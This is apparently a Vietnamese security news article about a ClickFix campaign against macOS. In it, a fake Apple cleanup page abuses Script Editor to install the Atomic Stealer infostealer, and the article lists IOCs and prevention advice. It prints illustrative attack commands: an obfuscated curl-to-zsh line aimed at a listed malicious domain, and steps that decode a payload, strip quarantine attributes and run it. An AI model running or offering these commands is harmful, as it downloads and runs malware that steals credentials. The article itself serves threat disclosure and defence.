Chiến dịch ClickFix mới được phát hiện đang nhắm mục tiêu vào người dùng macOS thông qua một kỹ thuật mới. Kỹ thuật này hoàn toàn bỏ qua Terminal, thay vào đó sử dụng Script Editor để thả mã độc Atomic Stealer infostealer lên các hệ thống bị xâm nhập. Đây là một tấn công macOS tinh vi, phản ánh khả năng thích ứng của các tác nhân đe dọa.
Chiến dịch này đánh dấu sự thay đổi rõ ràng trong cách kẻ tấn công phản ứng với các biện pháp kiểm soát bảo mật ngày càng chặt chẽ của Apple. Đây là lời nhắc nhở rằng kỹ thuật social engineering có thể vượt qua gần như mọi rào cản kỹ thuật hiện có.
Sự Chuyển Đổi Kỹ Thuật: Từ Terminal Đến Script Editor
Các cuộc tấn công ClickFix truyền thống thường dựa vào việc thuyết phục người dùng sao chép và dán các lệnh độc hại vào Terminal. Hành vi này thường được che đậy dưới dạng một bước khắc phục sự cố hoặc bảo trì hệ thống định kỳ.
Apple đã trực tiếp giải quyết vấn đề này trong macOS 26.4 bằng cách giới thiệu một tính năng bảo mật mới. Tính năng này quét các lệnh được dán vào Terminal trước khi chúng được thực thi, tạo ra một rào cản đáng kể đối với con đường tấn công quen thuộc này.
Tuy nhiên, thay vì từ bỏ chiến thuật này, kẻ tấn công đã đơn giản chuyển đổi điểm thực thi. Chúng thay thế Terminal bằng Script Editor, một ứng dụng tích hợp sẵn trong macOS hỗ trợ tự động hóa AppleScript và có lịch sử lạm dụng để phát tán mã độc đã được ghi nhận.
Các nhà nghiên cứu tại Jamf Threat Labs đã xác định biến thể mới này thông qua một trong các cơ chế phát hiện hành vi của họ. Cơ chế này đã gắn cờ việc thực thi dựa trên Script Editor là hoạt động đáng ngờ đang diễn ra trong thực tế.
Phát hiện này củng cố mức độ nhanh chóng mà các tác nhân đe dọa thích nghi khi một biện pháp kiểm soát mới xuất hiện. Trong trường hợp này, các tác nhân đã khai thác lược đồ URL applescript để gọi Script Editor trực tiếp từ trình duyệt web, lặng lẽ vượt qua các biện pháp bảo vệ Terminal mới mà không gây ra bất kỳ cảnh báo rõ ràng nào.
Chi Tiết Chuỗi Tấn Công và Thực Thi Mã Độc
Giai Đoạn Lừa Đảo Ban Đầu
Cuộc tấn công bắt đầu bằng một trang web giả mạo theo chủ đề Apple. Trang này tự giới thiệu là một công cụ dọn dẹp không gian đĩa với các hướng dẫn từng bước. Những hướng dẫn này giống hệt các hướng dẫn bảo trì macOS hợp pháp.
Khi người dùng nhấp vào nút Execute (Thực thi), trang sẽ âm thầm kích hoạt lược đồ URL applescript bên trong trình duyệt. Trình duyệt sau đó hiển thị một hộp thoại cấp quyền bảo mật yêu cầu mở Script Editor. Điều này khiến toàn bộ quá trình giống như một tác vụ hệ thống thông thường hơn là một mối đe dọa mạng đang hoạt động.
Sau khi Script Editor mở, nó hiển thị một script đã được điền sẵn và sẵn sàng để người dùng chạy. Script này mang các tiêu đề bản quyền giả mạo, tuyên bố là tiện ích tối ưu hóa bộ nhớ của Apple, tạo cho nó một vẻ ngoài đáng tin cậy cao.
Tùy thuộc vào phiên bản macOS, trải nghiệm sẽ khác nhau. Với macOS 26.4, người dùng được yêu cầu chấp thuận lưu script vào đĩa trước khi quá trình thực thi tiếp tục.
Kỹ Thuật Che Giấu và Tải Mã Độc
Khi người dùng chạy script được điền sẵn, chuỗi tấn công thực sự bắt đầu. Lệnh được nhúng bên trong script đã bị che giấu (obfuscated) bằng phương pháp dịch ký tự thông qua tiện ích tr. Tiện ích này chuyển đổi một chuỗi bị xáo trộn thành một URL hoạt động tại thời điểm chạy.
# Ví dụ minh họa cấu trúc lệnh che giấu
# (Mã độc thực tế sẽ phức tạp hơn và được che giấu kỹ lưỡng)
echo "ht_tpS://d_ryvEcAr.cOm/p_ay_lo_ad" | tr "_" "" | xargs curl -k | zshURL này gọi curl với cờ -k (hoặc --insecure), vô hiệu hóa xác thực chứng chỉ TLS. Điều này cho phép mã độc tiếp cận cơ sở hạ tầng không đáng tin cậy mà không gây ra cảnh báo bảo mật.
Nội dung được tải xuống được truyền trực tiếp vào zsh và thực thi hoàn toàn trong bộ nhớ. Điều này có nghĩa là mã độc không chạm vào đĩa trong giai đoạn ban đầu, giúp tránh các cơ chế phát hiện dựa trên file.
Payload giai đoạn đầu tiên sử dụng mã hóa Base64 kết hợp với nén gzip để che giấu nội dung thực tế của nó. Sau khi được giải mã, nó truy xuất một binary Mach-O.
Binary này được lưu vào /tmp/helper, loại bỏ các thuộc tính mở rộng (extended attributes) có thể liên quan đến nguồn gốc tải xuống, gán quyền thực thi, và sau đó chạy.
# Các lệnh CLI minh họa hành vi:
# Tải và thực thi payload từ URL (ví dụ đơn giản hóa):
curl -s -k <URL_MALICIOUS_PAYLOAD> | zsh
# Giải mã và lưu binary:
echo <BASE64_GZIPPED_PAYLOAD> | base64 -D | gzip -d > /tmp/helper
# Loại bỏ thuộc tính mở rộng (nếu có):
xattr -c /tmp/helper
# Cấp quyền thực thi:
chmod +x /tmp/helper
# Chạy binary:
/tmp/helperMã Độc Atomic Stealer: Khả Năng và Tác Động
Binary được lưu dưới dạng helper là một biến thể gần đây của Atomic Stealer. Đây là một loại mã độc infostealer nổi tiếng trên macOS. Mã độc này thu thập thông tin đăng nhập trình duyệt, mật khẩu đã lưu, ví tiền điện tử và các dữ liệu nhạy cảm khác từ máy bị nhiễm.
Khả năng của Atomic Stealer có thể dẫn đến việc chiếm quyền điều khiển tài khoản trực tuyến của nạn nhân, gây ra thiệt hại tài chính và rò rỉ thông tin cá nhân nghiêm trọng. Đây là một nguy cơ bảo mật lớn cho người dùng macOS.
Indicators of Compromise (IOCs)
Các chỉ số xâm nhập (IOC) đã được xác nhận của chiến dịch tấn công macOS này bao gồm các tên miền và mã hash sau:
- Tên miền độc hại:
dryvecar.comstorage-fixes.squarespace.comcleanupmac.mssg.me
- SHA-256 của binary Mach-O (tệp
helper):3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44
Biện Pháp Phòng Ngừa và Giảm Thiểu Rủi Ro
Để bảo vệ hệ thống khỏi các tấn công macOS tương tự, người dùng cần tuân thủ các khuyến nghị bảo mật sau:
- Tuyệt đối tránh thực thi bất kỳ script nào được nhắc bởi một trang web bên ngoài, ngay cả khi chúng hiển thị thương hiệu Apple.
- Người dùng nên từ chối các yêu cầu của trình duyệt để mở Script Editor hoặc bất kỳ công cụ tự động hóa nào từ một nguồn bên ngoài không xác định.
- Luôn giữ macOS được cập nhật lên phiên bản mới nhất hiện có. Điều này đảm bảo rằng các biện pháp kiểm soát bảo mật tích hợp mới nhất luôn hoạt động và chống lại các mối đe dọa như Atomic Stealer.
- Cẩn trọng với các chiến thuật social engineering. Luôn xác minh tính hợp pháp của các trang web và yêu cầu hệ thống trước khi thực hiện bất kỳ hành động nào.
